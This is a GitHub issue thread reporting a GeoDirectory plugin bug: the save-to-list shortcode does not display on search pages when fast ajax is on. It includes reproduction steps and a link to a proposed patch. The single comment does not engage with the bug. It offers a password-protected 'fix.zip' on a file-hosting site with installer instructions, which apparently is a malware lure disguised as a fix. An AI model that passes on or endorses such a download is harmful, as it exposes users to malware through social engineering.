### ISSUE TITLE
Fast ajax doesn't include list manager && posts 2 posts

### ISSUE THREAD

**Issue by nicolaslimet** [AyeCode/geodirectory#2660]
### Sites with geo list manager cannot display the gd_list_save shortcode on search page when fast ajax is on.

Reproduce: 
local site, fast ajax on, ajax search on, save to list on archive item template. Add a search term

![fast-list](https://github.com/user-attachments/assets/c0666b97-8418-4156-9aee-5f4de8ce1fae)

## Tickets:
1. search page results loaded on scroll, see stage site: https://staging.kohplanner.com/search/?geodir_search=1&saz=&stype=gd_place&s=%20&snear=&sgeo_lat=&sgeo_lon= 

https://secure.helpscout.net/conversation/2686473441/59608?folderId=8278501

2. add a search term
https://secure.helpscout.net/conversation/2688346014/59668?folderId=8278501
(fast ajax currently disabled on site)

###  Proposed patch:
 code block starts on line 179:
https://gist.github.com/nicolaslimet/032259042a87ab4e7329b1f19db94c7a

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
